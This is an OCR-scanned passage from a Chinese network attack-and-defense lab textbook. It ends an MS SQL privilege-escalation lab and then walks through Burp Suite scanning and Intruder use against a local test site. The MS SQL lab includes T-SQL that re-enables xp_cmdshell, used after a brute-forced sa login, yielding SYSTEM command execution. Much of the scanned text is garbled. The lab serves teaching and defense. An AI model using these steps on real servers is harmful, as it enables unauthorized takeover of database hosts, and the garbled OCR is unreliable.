Лана user. dic 
Mat iresk, pass. dic 
\йм\\вай1 user. dic 
Mast iresk vass. dic 





ел | зе | Са] _™ | 








图 5-69 设置 扫描 过 程 中 使 用 的 字典 





an 93.3 GUI 
文件 WD ӨШ SEV ТАФ Lume 帮助 多) 
lo bp ns m + u 

“Без —— [zu — - imma[mewu|moeH|smmR | 


= Eb su.-Server iie 








le 





€ Taa 1234567 


(182. 168. 1.55: 1433) 
зшли, жа: 


192. 166 ГТЗ RG 
192. 168. 1.55]: "SQL-Server ^1: 











图 570 显示 扫描 结果 


Te 设置 SQL 服务 器 





图 5-71 使 用 SQL Tools 工具 连接 到 MS SQL 数据 库 
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步骤 10: 连接 成 功 后 进入 如 图 5-72 所 示 的 操作 界面 。 


№ SQL 综合 利用 工具 











网 站 : hitp://www.1285 net 














连接 SQL Server : 192.168.1.55 成 功 


В 5-72 ”连接 成 功 后 的 操作 界面 


步骤 11: 选择 "利用 目录 ”一 执行 DOS 命令 ”选项 ,在 如 图 5-73 所 示 的 文本 框 中 输入 
要 执行 的 命令 。 例 如 ,输入 "whoami” 命 令 可 以 查看 在 线 的 用 户 。 








Г 三 次 运行 时 执行 结果 不 请 vam xs 出 





(С: \>uhoani | 
SQL Server 限 止 了 对 组 件 'xp_cadshell' 的 过 程 'sy3.xp_cmdshell， 的 访问 ， 因 为 此 组 件 已 1 











图 5-73 ”执行 DOS 命令 界面 


步骤 12: 使 用 查询 分 析 器 连接 MS SQL 数据 库 ,如 图 5-74 所 示 。 
步 又 13; 在 查询 分 析 器 中 执行 如 下 代码 (执行 过 程 和 结果 如 图 5-75 所 示 )。 


;EXEC sp configure 'show advanced options', 1 —— 
;RECONFIGURE WITH OVERRIDE —— 

;EXEC sp configure 'xp cmdshell', 1 -- 
;RECONFIGURE WITH OVERRIDE —— 

;EXEC sp configure 'show advanced options', 0 —— 





步骤 14: 再 次 使 用 SQL Tools 执行 whoami 命令 时 ,返回 信息 如 图 5-76 所 示 , 从 中 可 
以 看 出 ,已 经 获得 了 最 高 权限 (system) ,权限 提升 过 程 结束 。 
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g saLsevels} [182168155 v] | 


加 果 SQL Server BAE RB 
uL wd 


[ss j s» j ma | 


5-74 ”使 用 查询 分 析 器 连接 MS SQL 数据 库 









192. 168. 1. 55. 








«< 5QL LLLI] [rd 
XHq dp HIY ТАФ Som WHY 
A SaD ^er AM o D- v s [Dese аза G m 
对 和 浏览 器 Q) xj 


192168 15500) =» 









无 标题 1*] 


IEXEC sp configure — "show advanced options’, 0 一 









ov advanced options ET 
ааа Ek 0 ERD l, 
show advanced options’ 已 从 1 









i ü 








575 ”在 查询 分 析 器 中 执行 相关 代码 


5.7.4 任务 与 思考 
本 实验 介绍 了 MS SQL 提 权 的 实现 方法 ,通过 实验 读者 会 发 现 提 权 攻 





fF 存在 的 危害 


性 。 通 过 提 权 ,普通 用 户 将 会 拥有 管理 员 的 权限 。 在 拥有 了 管理 员 权限 后 ,攻击 者 可 以 像 控 


制 本 地 计算 机 一 样 来 操控 被 攻击 对 象 。 
在 大 多 数 情况 下 ,MS SQL 服务 器 将 被 安装 在 一 个 混合 模式 下 , 它 的 默认 


JH PE sa, 很 
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Г 二 次 运行 时 执行 结果 不 读 V hh fr xs 出 





С: \>whoani 
nt authorityVsystem 











В 5-76 已 经 实现 提 权 操作 


多 时 候 对 于 默认 用 户 只 会 设置 一 个 简单 的 密码 ,这 意味 着 容易 使 用 字典 文件 进行 暴力 破解 
得 到 密码 。 为 此 ,针对 MS SQL 提 权 攻击 ,最 简单 和 有 效 的 办 法 就 是 为 系统 管理 账户 设置 
复杂 的 密码 并 进行 定期 更 换 , 同 时 提供 完整 的 系统 日 志 , 并 对 日 志 记录 进行 及 时 分 析 , 当 发 


Ше: 








h А RAQ] h ds JP UE R EHA. A E. S ИШ ЖЫРА MS SQL 安装 补 


丁 程序 。 
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Web 浏览 器 既是 用 户 访 问 互联 网 的 必 备 工具 ,也 是 用 户 进入 互联 网 世界 的 入 口 , 因 此 
Web 浏览 器 的 安全 决定 了 互联 网 应 用 的 安全 。 与 大 量 功 能 各 异 的 客户 端 软件 相 比 ,Web 浏 
览 器 虽然 统一 了 用 户 访问 互联 网 的 方式 ,但 由 于 Web 浏览 器 存在 内 核 多 样 ,插件 丰富 、 功 能 
扩展 性 强 .兼容 不 同 应 用 等 特点 ,致使 Web 浏览 器 存在 大 量 的 安全 漏洞 。 这 些 安全 漏洞 一 
旦 被 利用 ,将 会 严重 影响 互联 网 用 户 的 信息 安全 。 本 章 从 攻击 与 防御 两 个 不 同 的 角度 ,通过 
具体 实验 介绍 Web 浏览 器 的 攻防 方法 。 





6.1 Burp Suite 漏洞 扫描 使 用 


6.1.1 预备 知识 : Burp Suite 工具 介绍 


Burp Suite 是 一 个 主要 针对 Web 应 用 程序 进行 攻击 的 工具 集 ,为 便于 在 应 用 中 实现 不 
同 工 具 之 间 的 交互 性 和 功能 整合 , 它 提供 了 一 个 集成 平台 。 例 如 ,在 一 个 工具 处 理 HTTP 
请 求 和 响应 时 ,通过 该 平台 可 以 选择 调用 其 他 任意 的 工具 。 而 且 , 为 方便 其 他 应 用 程序 的 调 
用 ,Burp Suite 工具 还 提供 了 相应 的 接口 。 

Burp Suite 以 代理 方式 工作 ,默认 的 代理 端口 为 8080。 在 具体 应 用 中 ,可 以 将 运行 
Burp Suite 工具 的 主机 设置 成 一 个 Web 浏览 器 使 用 的 代理 服务 器 ,以 便 拦截 所 有 被 扫描 的 
Web 网 站 的 流量 , 供 系统 查看 、 分 析 和 修改 。 此 外 ,Burp Suite 还 提供 了 地 图 功能 ,可 以 对 被 
扫描 主机 和 目录 生成 一 个 地 图 ,以 直观 的 形式 供 使 用 者 进行 分 析 。 

Burp Suite 平台 主要 提供 了 以 下 工具 。 

(1) Proxy( 代 理 )。Proxy 是 一 个 拦截 HTTP/HTTPS 的 代理 服务 器 ,通过 代理 服务 器 
来 拦截 浏览 器 与 目标 应 用 程序 之 间 的 流量 ,为 进一步 查看 或 修改 相关 信息 提供 原始 数据 流 。 

(2) Spider WKE). Spider 是 一 个 具有 特殊 应 用 功能 的 网 络 爬 虫 , 它 能 完整 地 枚 举 
应 用 程序 的 内 容 和 功能 。 

(3) Scanner( 扫 描 ) Scanner Æ Burp Suite 具有 的 一 个 高 级 应 用 工具 ,使 用 该 工具 可 
以 扫描 发 现 Web 应 用 程序 的 安全 漏洞 。 

(4) Intruder( 干 扰 者 )。Intruder 是 Burp Suite 提供 的 一 个 可 配置 的 暴力 破解 攻击 工 
具 , 主 要 实现 对 Web 应 用 程序 进行 自动 攻击 ,包括 收集 有 用 的 数据 漏洞 模糊 测试 等 。 

(5) Repeater( 中 继 器 ) Repeater 是 一 个 帮助 攻击 者 完成 Web 站 点 扫描 的 辅助 工具 ， 
利用 该 工具 可 以 根据 攻击 者 的 需要 单独 发 送 HTTP 请 求 , 并 对 请 求 的 响应 进行 分 析 , 通 过 
分 析 补 充 判断 Web 站 点 存在 的 安全 漏洞 。 

(6) Sequencer( 定 序 器 ) Sequencer 是 一 个 用 于 在 扫描 得 到 的 随机 样本 中 对 指定 的 数 
据 项 进行 分 析 的 工具 。 例 如 ,利用 Sequencer 工具 可 以 测试 应 用 程序 的 会 话 令 牌 (session 


tokens) 。 
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(7) Decoder( 编 码 器 )。Decoder 是 Burp Suite 提供 的 一 款 编码 解码 工具 ,利用 Decoder 
可 以 将 原始 数据 转换 成 各 种 需要 的 编码 和 哈 希 表 。 

(8) Comparer( 比较 器 )。Comparer 是 一 个 以 可 视 化 方式 对 比分 析 两 项 数据 之 间 差 异 
性 的 工具 。 例 如 ,在 枚 举 用 户 名 的 过 程 中 ,利用 Comparer 工具 可 以 对 比分 析 登 录 成 功 和 失 
败 时 服务 器 端 反馈 结果 的 区 别 。 


6.1.2 实验 目的 和 条 件 


1. 实验 目的 

通过 本 实验 ,学 习 漏洞 扫描 技术 的 基本 原理 ,了 解 漏洞 扫描 技术 在 网 络 攻防 中 的 作用 ; 
通过 上 机 实验 ,掌握 使 用 Burp Suite 对 目标 网 站 进行 扫描 的 具体 方法 ,并 根据 报告 做 出 相应 
的 防护 措施 。 


2. 实验 条 件 
本 实验 所 需要 的 软 硬 件 清 单 如 表 6-1 所 示 o 
表 6-1 Burp Suite 漏洞 扫描 使 用 实验 清单 




















类 = E 号 软 硬 件 要 求 я № 
1 数量 16 
攻击 机 2 操作 系统 版 本 Windows XP 及 以 上 
3 软件 版 本 Burp Suite 
1 数量 16 
л 2 操作 系统 版 本 Windows Server 2003 
3 软件 版 本 无 











6.1.3 实验 过 程 


步骤 1: 登录 到 实验 场景 中 的 靶 机 ,在 该 计算 机 上 需要 事先 搭建 一 个 网 站 ,并 且 能 够 正 
常 访问 。 例 如 ,本 实验 中 搭建 了 一 个 简单 的 可 以 使 用 域名 www. sql. com 访问 的 网 站 ,如 
图 6-1 所 示 。 

需要 说 明 是 ,为 便于 实验 的 进行 ,本 实验 中 搭建 的 网 站 需要 具备 后 台 管理 功能 , 当 后 台 
管理 员 登 录 时 ,需要 验证 其 输入 的 用 户 名 和 密码 的 正确 性 ,以 此 对 登录 者 身份 的 合法 性 进行 
认证 。 

步骤 2. 登录 攻击 机 (本 实验 使 用 Windows ХР), Ж Burp Suite 软件 ,成 功 安装 后 的 
运行 界面 如 图 6-2 所 示 。 

步骤 3: 打开 C:\Windows\System32\drivers\etc\hosts 文件 ,将 靶 机 Windows Server 
2003 上 的 网 站 在 客户 机 (攻击 机 ) 上 进行 映射 。 本 实验 中 Windows Server 2003 的 IP 地址 
是 192.168.1.104, 所 以 在 hosts 文件 中 的 映射 方式 为 192. 168. 1. 104 www. sql. com, 如 
图 6-3 所 示 。 

步 又 4: 在 “命令 提示 符 ” 中 输入 “ping www. sql. com” 命 令 , 当 网 站 的 主机 名 和 IP 地 址 
之 间 的 映射 正常 时 ,将 出 现 网 络 连 接 正常 的 提示 信息 ,如 图 6-4 所 示 。 再 在 浏览 器 的 地 址 栏 
中 输入 网 站 名 称 (www. sql. com) ,如 果 当 前 配置 无 误 , 则 会 显示 类 似 图 6-1 中 的 页 面 信息 。 
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图 6-1 在 靶 机 上 搭建 一 个 简单 的 网 站 






































6-2 Burp Suite 运行 界面 
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Ë hosts - 记事 本 
文件 F) Шао 格式 0) EEV 帮助 00 
# Copyright (c) 1993-1999 Microsoft Corp. 
". 
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows. 
" 
" This file contains the mappings of IP addresses to host names. Each 
* entry should be kept on an individual line. The IP address should 
# be placed in the first column followed by the corresponding host name. 
# The IP address and the host name [should be separated by at least one 
# space. 
п 
# Additionally, comments (such as these) may be inserted on individual 
" lines or following the machine name denoted by a 'W' symbol. 
в 
# For ехапр1е: 
" 
" 102.54.94.97 rhino.acne.con # source server 
" 38.25.63.10 x.acme.com # x client host 
localhost 
É burp suite CES 
图 6-3 进行 IP 地 址 与 主机 名 之 间 的 映射 
有 1985-2001 Microsoft Corp. 
*NDocuments and Settings Adninistrator)ping www.sql.com 
[Pinging www.sql.com [192.168.1.104) with 32 bytes of data: 
[Reply from 192.168.1.104: bytes=32 tineCins TTL=128 
[Reply from 192.168.1.104: bytes=32 tine<lns TTL=128 
[Reply from 192.168.1.104: bytes=32 tineCins TTL=128 
[Reply from 192.168.1.104: bytes=32 time<1ns TTL=128 
tics for 192.168.1.104: 
Sent = 4, Received = 4, SE 1 
Approximate round trip times in nilli-secon 
Minimum = Øns, Maximum = Ons, Average = @' 
:NDocuments and Settings Administrator), 
6-4 ”用 “ping www. sql. com” 命 令 测 试 www. sql. com 网 站 是 否 可 以 访问 
步骤 5: Burp Suite 具有 网 络 代理 功能 ,默认 运行 在 端口 8080 上 ,使 用 这 个 代理 ,可 以 
P 


ior 
实验 中 


验 使 用 








“代理 服务 器 ” 栏 中 选 


框 中 输 
2b 


开 IE 浏 览 器 ,访问 网 站 www. google. com С [n] Z 
6-6 所 示 的 显示 信息 .说明 Burp Suite 已 经 rr he 


现 如 图 





修改 从 客户 端 到 Web 应 用 程序 的 数据 包 。 为 了 拦截 请 求 数 据 包 , 并 对 其 进行 操作 ， 


必须 对 Burp Suite 中 有 关 攻 击 机 的 浏览 器 进行 配置 ,将 其 配置 为 代 
IE 浏览 器 ,可 选择 “Internet 选项 ”一 “连接 ”一 “局 域 网 设置 ”选项 ， 


入 相应 的 信息 ,如 图 6-5 所 示 。 
Ж 6. 设置 好 攻击 机 的 Web 浏览 器 并 邓 











EMO Sis 先 运行 Burp Suit 
要 确保 Burp Suite 已 


理 服务 器 。 本 实 
在 打开 对 话 框 的 


中 “为 LAN 使 用 代理 服务 器 ” 复 选 框 ,并 分 别 在 “地 址 和”* 端 后 ”文本 


e 软 件 ,然后 再 打 
经 运行 ) ,将 会 出 
目的 信息 。 
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GET /search?client=navclient-autosfeatures=Rank:sq"info:http://vvw, sql.comsch703099636888 
НТТР/1.0 


Accept: */* 
User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0: Windows NT 5.1; SV1; Alexa 
Toolbar) 

: no-cache 
Cache-Control: no-cache I 
Host: www.google.com 





图 6-6 Burp Suite 开始 捕获 Web 浏览 器 的 操作 
步骤 7: target 选项 卡 。target 是 一 个 目标 选项 卡 , 在 IE 浏览 器 中 访问 的 网 站 信息 将 














会 显示 在 该 选项 卡 下 方 的 site map 选项 卡 中 。scope 选项 卡 设 置 具体 的 扫描 范围 ,如 图 6-7 
所 示 。 





fii 


步骤 8; spider З= EB i: PA ДЕШ oe fe Rit [e] И г. ШЧ 6-8 Brzn 。 
步骤 9: 在 图 6-8 "P üt zc fp Ж] ze rh y ДИ Ж e ЦИ 85 9] 9s 2, ЖК CA 3:389 J www. sal. com) 后 
E ,在 出 现 的 快捷 菜单 中 选择 spider this host 选项 ,就 会 自动 跳 转 到 spider 页 面 , 显 示 正 





在 候 取 网 页 ,已 经 发 送 的 请 求 数量 、 字 节 传 输 量 、 仆 取 范围 等 信息 ,如 图 6-9 所 示 。 


步骤 10: 主动 扫描 网 站 。 该 操作 在 target site map 选项 卡 中 进行 。 在 图 6-8 中 的 左 


侧 列表 中 选取 网 站 (本 实验 为 www. sql. com) 后 右 击 ,在 出 现 的 快捷 菜单 中 选择 actively 
scan this host 选项 ,将 会 出 现 主动 扫描 向 导 提 示 页 面 , 系 统 提 示 用 户 已 经 选择 了 一 些 项 目 
作为 扫 描 的 对 象 。 为 了 取得 更 好 的 扫描 效果 ,可 以 选中 或 取消 选中 相关 的 项 目 ( 一 般 选 择 默 
认 设置 即 可 ) ,如 图 6-10 所 示 。 
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suite professional 


4.07 — licensed to 


burp intruder repeater window about 


DrakonHaSh 





















































target ЖШ] spider | scanner | intruder | repeater | sequencer | decoder | comparer | options | alerts 
sitemap | scope 
target scope 
Define the in-scope targets for your current work This configuration affects the 
behaviour of tools throughout the suite. АЙ fields take regex strings. The easiest way to 
configure scope is to browse to your target and use the context menus in the site тар 
to include or exclude URL paths. 
include in scope Ñ 
protocol host/ IP range роп file ] edit 













































































burp intruder repeater window about 


图 6-7 设置 scope 选项 卡 


licensed to DrakonHa: 








a E 





intruder 





options | alerts 


repeater 
























































sitemap | scope 
Filter: hiding not found items; hiding CSS, image and general binary content. hiding 4x responses; hiding empty folders 
~ http lunion2 50bang. or9 
© hitpWww.2345,com 
о http;/www.aspsky net [default asp 
о http www google com default азр?базз=1 
18 
WBE httpuwww sqLcomy = 
add йет to scope index asp?classid- 1&Ndassid- 1 
Mistasp 
|fistasp?id-T 
actively scan this host LA 
jswecss 
passively scan this host 
engagementtools — » 
compare site maps. 
— GET / НТТР/1.0 
expand requested items Accept: image/git, image/x-xbitmap, image/jpeg, 
Bx image/pjpeg, application/x-shockvave-flash, 
ed application/vnd.ms-excel, 
copy URLs in this host epplication/vnd.ms-poverpoint, applicarion/msword, */* 
Accept-Language: zh-cn 
сору links in this host User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; 
save selected ilems Windows NT 5.1; SV1) 
Host: www.sql.com 
Proxy-Connection: Keep-Alive 
z 6 ar t 

































































使 用 spider KERA m ë S 
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$ burp suite professional у1.4.07 — licensed to DrakonHaSh 


burp intruder repeater window about 
“target MIN, spider | scanner | intruder | repeater | sequencer | decoder | comparer | options | alerts 
control | options 

(И spider running 


To begin spidering, browse to the target application, then select one or more nodes In 
the target site map, and choose "spider from here". 
























































requests made: 42 
bytes transferred: 133,713 
requests queued: ° 
forms queued: ° dear queues 
Spider scope 
© use suite scope [defined іп target tab] [9] 





O use custom scope 











Actively scan multiple items 

You have selected 18 items for active scanning Before continuing, you can use the filters below to 
remove certain categories of items, to make your scanning more targeted and efficient. 

[v] remove duplicate items (same URL and parameters) [5 items] К 
C] remove items already scanned (same URL and parameters) [0 items] 

[ remove outof-scope items [0 items] 

[e] remove items with media responses [1 item] 


[ remove items with the following extensions [0 items] 





[isotipa pna css 

















6-10 选中 或 取消 选中 相关 的 项 目 


步骤 11: 单 击 next 按钮 ,出现 如 图 6-11 所 示 的 对 话 框 ,显示 已 经 获取 的 信息 。 

步骤 12: 接着 单 击 ok 按钮 ,系统 会 提示 针对 该 网 站 有 些 扫描 超出 了 范围 ,是 否 需要 继 
续 进 行 , 单 击 Yes 按钮 即 可 。 之 后 ,所 有 有 关 该 网 站 (本 实验 为 www. sql. com) 的 信息 都 会 
显示 ,如 图 6-12 所 示 。 

步骤 13. 扫描 结束 后 ,需要 对 漏洞 进行 详细 的 分 析 。 可 以 选取 相应 的 漏洞 名 称 ,然后 在 
{т ЕЛИ advisory( 公 告 ) 栏 中 显示 有 关 该 漏洞 的 详细 信息 ,具体 包括 相应 的 问题 名 称 、 严 重 
程度 、 确 信 程度 、 路 径 地 址 等 ,如 图 6-13 所 示 。 
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Confirm items to scan 


Review the items you have зеіесіеа for scanning. Double-cick items to view full details. You can remove individual items which 
you do not wish to scan, or go back to modify your general filters. 







































































host method| URL params|cookies| status | length | MIME type| exten: 
hüpiwwwsqicom GET J 0 g Qoo |3713 HTML А 
hipwww sal. com |GET io 0 1 200 (2450 HTML 
httpywwwsqlcom [GET asp 0 1 200 3646 ]HTML эзр 
hütpiwww.sq.com [GET asp?dassid- 1 1 1 200 |3755 [HTML азр 
hüipiwwwsqLcom |GET dex asp 0 1 200 4861 HTML азр 
hüpwwwsdicom |GET  jindexasp?dassid-1&Ndassid-1 |2 1 200 |4936 HTML азр | | 
hüp/wwwsqlcom  |POST jindexasp?dassid-&Ndassid- 3 1 200 — 4861 [HTML азр 
htp Iwww.Sql com 1 1 200 4962 HTML азр 
Ihtto./Www.Sqi.com g 1 500 139 asp 
http www зд! сот 1 1 500 [1117 asp 
Пар www sqLcom 0 1 1500 |1754 [HTML ^ asp |>| 
4 a » 





i 
i 
i 






































图 6-11 显示 已 经 获取 的 信息 








“target Ж ге | scanner | intruder | repeater | sequencer | decoder | comparer | орюпз | alerts 
results | scan queue | ive scanning | optons 


TE 
- 
































HTTP PUT enabled 
Cookie without HttpOnly flag set 
© ў Cross-domain Referer leakage [2] 
і Emal addresses disclosed 
і HTML does not specify charset 
j Directory listing 
i Content type incorrectly stated 
œ ў HTML uses unrecognised charset [4] 










































































6-12 BRAX www. sql. com 网 站 的 详细 信息 


步骤 14: 访问 后 台地 址 www. sql. com/admin. asp, 本 实验 中 使 用 的 “用 户 名 称 ” 和 “用 
户 密码 ”都 是 admin, 如 图 6-14 所 示 。 

步骤 15: 正确 输入 用 户 名 称 和 用 户 密 码 后 ,进入 管理 界面 ,如 图 6-15 所 示 。 

步骤 16: 这 时 ,在 Burp Suite 的 proxy—history 选项 卡 中 ,可 以 看 到 刚才 提交 验证 的 页 
面 登录 认证 信息 ,其 中 method 是 以 post 方式 提交 的 ,网 址 是 www. sql. com/Chkadmin. 
asp。 选 取 该 网 址 后 右 击 ,在 出 现 的 快捷 菜单 中 选择 send to intruder 选项 ,如 图 6-16 所 示 。 


Fa 
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р 
burp intruder repeater window about 


to Drak 





target ЖАЙ сое | scanner | nmder 





























results | scan queue | Ive scanning | options 



















Cookie without HttpOnly flag set 
Cross-domain Referer leakage [2] 
Email addresses disclosed 

HTML does not specify charset 
Directory listing 

Content type incorrectly stated 

Ф į HTML uses unrecognised charset [4] 





ee de Me de jte 





































HTTP PUT is enabled on the web server. The file /cd4ca10bfff0c972 bt was 
uploaded to the server using the PUT verb, and the contents of the file were 
subsequently retrieved using the GET verb. 














图 6-13 扫描 结束 后 显示 的 完整 信息 





) 查看 WV) WOO IAT 
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BIE O) (E) http://www. sql. соо, 











$00 a 


хоп 9 [£8 











Google:-/10 Аека: @ Internet 
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I - Nicrosoft Internet Explorer 
хт) бп ӘБУ био) ТАТ 帮助 00 


Qs-O nid Гау @ @- 288 


AE] http: //wrv. sql. con/nanage. asp 














v Вяз ss 





ome 动 网 文章 管理 系统 管理 页 面 
Онг 
оваке жерини: 


ВРЕТ 1, 通过 we 添加 文章 ,请 亿 择 添 加 软件 。 换 作用 户 : 所 有 用 户 
ass, 3 对 已 经 添加 文章 修改 或 基 队 ,请 点 左边 相关 连接 进行 巡 作 。 折 作用 户 : UAP, DESEA 
人 退出 系统 4， 对 栏目 进行 添加 修改 大 除 ， 请 点 左边 相关 连接 进行 拘 作 。 抬 作用 户 : BOR 

5, 用 户 的 增加 修改 租 除 ， 请 点 左边 相关 连接 进行 换 作 。 拘 作用 户 : BAP 

з, 为 了 系 撞 的 安全 性 ,高 开 管理 请 点 击 里 出 系统 


9, 有 何 建议 请 到 我 们 的 论坛 提出 mw dvbbs net 


动 同 先 樟 版 权 所 有 , Copyright Ç 2000-2004 aspsky. net, ALL Rights Reserved 











агр suite 












































































































































POST /Chkadmin.asp НТТР/1.0 
Accept: image/gif, image/x-xbitmap, image/ |on/ x-shockvave-f1ash, 
lapplication/vnd.ms-excel, application/vnd. jsvord, */* 

Referer: http://www.sql.com/admin.asp 
Accept-Language: zh-cn 

Content-Type: application/x-vwww-form-urlen 
Proxy-Connection: Keep-Alive 




















图 6-16 选择 send to intruder 选项 
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步骤 17. 程序 会 自动 跳 转 到 intruder 选项 卡 ,选择 下 方 的 positions 选项 卡 后 ,将 会 看 
到 刚才 提交 的 请 求 信 息 , 如 图 6-17 所 示 。 读 者 会 发 现 ,网 站 后 台 登 录 时 使 用 的 “用 户 名 称 ” 
和 “用 户 密码 ”等 信息 都 直接 显示 在 其 中 ,用 户 名 称 和 密码 都 是 admin, 





burp intruder repeater window about 


























target S =poer | scanner | intruder | repeater | sequencer | decoder | comparer | options | alens 
Te] 


target | positions | payloads | options 



































О paytoad positions length: 577 
POST /Chkadmin.asp HTTP/1.0 

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, 
japplication/x-shockvave-flash, application/vnd.ms-excel, 
lapplication/vnd.me-powerpoint, application/msword, */* санд 
Referer: http://www.sql.com/admin.asp 
Accept-Language: zh-cn 

Content-Type: application/x-www-form-urlencoded 
Proxy-Connection: Keep-Alive 


























auto $ 














User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windovs NT 5.1; SV1) Mean, 
Host: www.sql.com 

Content-Length: 49 

Pragma: no-cache 



































图 6-17 显示 网 站 后 台 登 录 的 用 户 名 称 和 密码 等 信息 


步骤 18: 在 target>site map 选项 卡 中 ,选择 网 站 名 称 后 右 击 , 在 出 现 的 快捷 菜单 中 选择 
engagement tools—find scripts 选项 ,可 以 扫描 并 显示 网 站 的 所 有 脚本 页 面 ,如 图 6-18 所 示 。 


ed to Dr 

















































































































































'9- һйр/0о.тистовой сот 
~ hapyunion2.50bang org 
© htpywww2345 сот GET [j [200 
© http www aspsky net GET И poo Е 
© httpwww google.com GET 回 [200 
- w sq com арми э! с. СЕТ Jindex.asp Lj j200 lad 
ttp ww мара [пр www salc |GET lindexasp?classid=&Nclassid= к po mH 
ios hap www sql cPOST lindex asp?ciassid-&Ndassid- 加 20 48 
remove йет тот scope GET lindexasp?classid=1 ij 20 a 
GET 7d 加 |200 
spider his host c [eer 8—29 
actively scan this host z 
passively scan this host || request | response 
Е [те 


























compare site maps 
image/gif, imege/x-xbitiep, iiege/jpedi 
тонери peg, application/x-shockwave-flash, 
expand requested items 3on/vnd.ms-excel, 
apa, ion/vnd.ms-powerpoint, application/msword, */* |=| 
anguage: zh-cn 
copy URLs in this host ozilla/4.0 (compatible; MSIE 6.0; 
11; SV) 
сору links in this host e 
save selecedioms nnection: Keep-Alive 























6-18 ”扫描 并 显示 网 站 的 所 有 脚本 页 面 
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步骤 19: 单 击 search 按钮 就 可 以 将 当前 网 站 的 脚本 页 面 全 部 列 出 来 ,如 图 6-19 所 示 。 
操作 者 可 根据 显示 的 内 容 , 对 网 站 进行 系统 的 分 析 。 






































target — |hüp/Mwwwsulcom —  jindexasp javascript submil(), var onecount onecou 14:28:11 12 Ж. 
target һр www 5qLcom [index asp?dassid=&Ndassid= javascriptsubmit(), var onecount, onecou... 14:28:11 12 i 
scanner |htp/wwwsqlcom ^ ^ jAndexasp?dassid-&Ndassid- javascript submit(), var onecount onecou... 14:31:12 12 五 
ltarget — |htp/wwwsqicom — jindexasp?cassiá-&Ndassid- javascript submil() var onecount onecou. . 14:28:14 12 五 





Index asp7dassid-t iptsubmit(), var onecount onecou [14:28:11 12# 
arget InitpJwww sqlcom — jAnderasp?dassió-T&Ncassid- javascript submit() var onecount onecou 14:28:14 12 五 
farget |http/www.saicom —  jindexasp?dassid-i&Ncassid-i — javascriptsubmili), var onecount onecou.. [14:28:11 12 A. 























[larget — |ntp/wwwsqLcom — JAndexasp?dassid-2 onecount onecount-0, subcal = new _. [14 28.11 12 & 
|larget ^ [http/www.sql.com [robots bt. history back(1) 14:28:14 12. 
|larget _ |htp//wwwsqLcom — ти queryasp Маг onecount; onecount-0; subcal = new _ [14:28:11 12A. 
t 
+ 
















































































图 6-19 列 出 网 站 的 全 部 脚本 页 面 信息 


步骤 20: repeater 功能 用 于 在 不 同 的 情况 下 修改 和 发 送 相同 的 请 求 ,并 对 返回 信息 进 
行 分 析 , 如 图 6-20 所 示 。 


burp suite professional vl.4.07 






























































request 
raw | hex 
GET / ETTP/1.0 Е 























клк кл O matches 























response 
raw | headers | hex | тті | render 
HTTP/1.1 200 OM a 
Connection: close 

Date: Sun, 12 May 2013 06:40:50 СНТ 
Server: Microsoft-IIS/6.0 
MicrosoftOfficeWebServer: 
Content-Length: 3438 
Content-Type: text/html 
Set-Cookie: ASPSESSIONIDCCSCSSRC-OABDHHJDGFCAGIICCFHEDKJE; pathe/ El 




















.0 Pub 




















6-20 ”根据 不 同 的 情况 修改 和 发 送 相同 的 请 求 并 进行 分 析 
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步骤 21: sequencer 功能 主要 用 来 检查 Web 应 用 程序 提供 的 会 话 令 牌 (该 令 牌 的 产生 





是 随机 的 ) ,并 执行 各 种 测试 ,如 图 6-21 所 示 。 















































burp suite professional v1.4.07 licensed to DrakonHaSh 
burp intruder repeater window about 
target ЖА] spider | scanner intruder | repeater | sequencer | decoder | comparer | options | alerts 
[ We capture | manual load | options 
select request 
= remove 
= | dea 




















send гедер here trom other tools to configure a live capture 
(find a request within the application which retums a token whose randomness you want to analyse 
e 
identify token in response 


token location | capture options. 























© cookie 














O form field: 


@ custom location: 




















检查 Web 应 用 程序 提供 的 会 话 令 牌 的 随机 性 


图 6-21 
解码 数据 ,还原 数据 原来 的 形式 或 进行 编码 和 加 密 数据 ， 





步骤 22: decoder 功能 可 用 于 
操作 界面 如 图 6-22 所 示 。 













































































图 6-22 解码 数据 找 回 原来 的 数据 形式 
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步骤 23: comparer 功能 用 来 执行 任意 的 两 个 请 求 、 响 应 或 任何 其 他 形式 的 数据 之 间 的 
比较 ,如 图 6-23 所 示 。 


$ burp suite professional vl.4.07 — licensed to DrakonHaSh 















































load. paste, or send data here from other tools to perform a compare 




















27 


Hem 2 
# | length data 




















图 6-23 ”执行 任意 的 两 个 请 求 


对 于 其 他 的 一 些 功能 ,读者 可 以 继续 查阅 相关 资料 进行 学 习 ,并 通过 相关 实验 掌握 其 应 
用 方法 。 


6.1.4 任务 与 思考 


Burp Suite 是 一 个 功能 强大 的 漏洞 扫描 、 检 测 和 分 析 工 具 集 ,本 实验 仅 涉及 该 工具 集中 
的 部 分 工具 应 用 ,建议 读者 在 本 实验 的 基础 上 ,通过 查阅 Burp Suite 技术 文档 ,进一步 掌握 
相关 工具 的 使 用 方法 。 同 时 ,为 便于 读者 加 强 对 漏洞 扫描 和 利用 的 学 习 , 建 议 进一步 学 习 以 
下 内 容 。 

1. SQL 注入 

SQL 语言 是 一 种 数据 库 查询 语言 ,SQL 注入 攻击 则 是 后 台数 据 库 引 擎 将 用 户 输入 的 恶 
意 语句 当 作 代码 执行 ,导致 数据 库 被 入 侵 。 利 用 SQL 注入 技术 来 实施 网 络 攻 击 常 称 为 
SQL 注入 攻击 ,SQL 注入 攻击 的 本 质 是 利用 Web 应 用 程序 中 所 输入 的 SQL 语句 的 语法 处 
理 , 针 对 Web 应 用 程序 开发 者 编程 过 程 中 未 对 SQL 语句 传人 的 参数 做 出 严格 的 检查 和 处 
理 所 造 成 的 。 习 惯 上 将 存在 SQL 注入 点 的 程序 或 网 站 称 为 SQL 注入 漏洞 。 

实际 上 ,SQL 注入 是 存在 于 有 数据 库 连 接 的 应 用 程序 中 的 一 种 安全 漏洞 。 在 具体 的 攻 
击 过 程 中 ,攻击 者 一 般 通过 在 应 用 程序 中 预先 定义 好 的 查询 语句 结尾 加 上 额外 的 SQL 语句 
元 素 , 欺 骗 数据 库 服务 器 执行 非 授 权 的 查询 。 这 类 应 用 程序 一 般 是 基于 Web 的 应 用 程序 ， 
它 允 许 用 户 输入 查询 条 件 ,并 将 查询 条 件 嵌入 SQL 请 求 语 句 中 ,发 送 到 与 该 应 用 程序 相关 
